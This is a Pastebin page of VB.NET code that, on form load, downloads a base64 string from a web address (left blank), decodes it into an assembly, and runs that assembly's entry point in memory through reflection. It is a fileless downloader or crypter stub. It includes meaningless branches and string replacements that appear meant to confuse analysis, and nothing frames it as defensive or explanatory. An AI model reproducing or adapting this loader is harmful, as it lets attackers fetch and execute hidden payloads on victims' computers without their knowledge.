Advertisement
Guest User

Untitled

a guest
May 24th, 2017
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.75 KB | None | 0 0
  1. Public Class Form1
  2.  
  3. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  4. Dim HVR As New Class1
  5. Dim ee As Object = HVR.ss
  6. Dim hv As Object = Reflection.Assembly.Load(ee).entrypoint
  7. Dim gd As String = "x--r"
  8. If PictureBox1.Cursor = Cursors.Hand Then
  9. Dim abc As Object = hv.invoke("", Nothing)
  10. Else
  11. Dim abc As Object = hv.invoke("nothing".Replace("x--r", "nothing"), Nothing)
  12. End If
  13. End Sub
  14. End Class
  15. ------------------------------------
  16. Public Class Class1
  17. Protected vv As New Net.WebClient
  18. Public aa As String = vv.DownloadString("")
  19. Public ss As Byte() = Convert.FromBase64String(aa)
  20. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement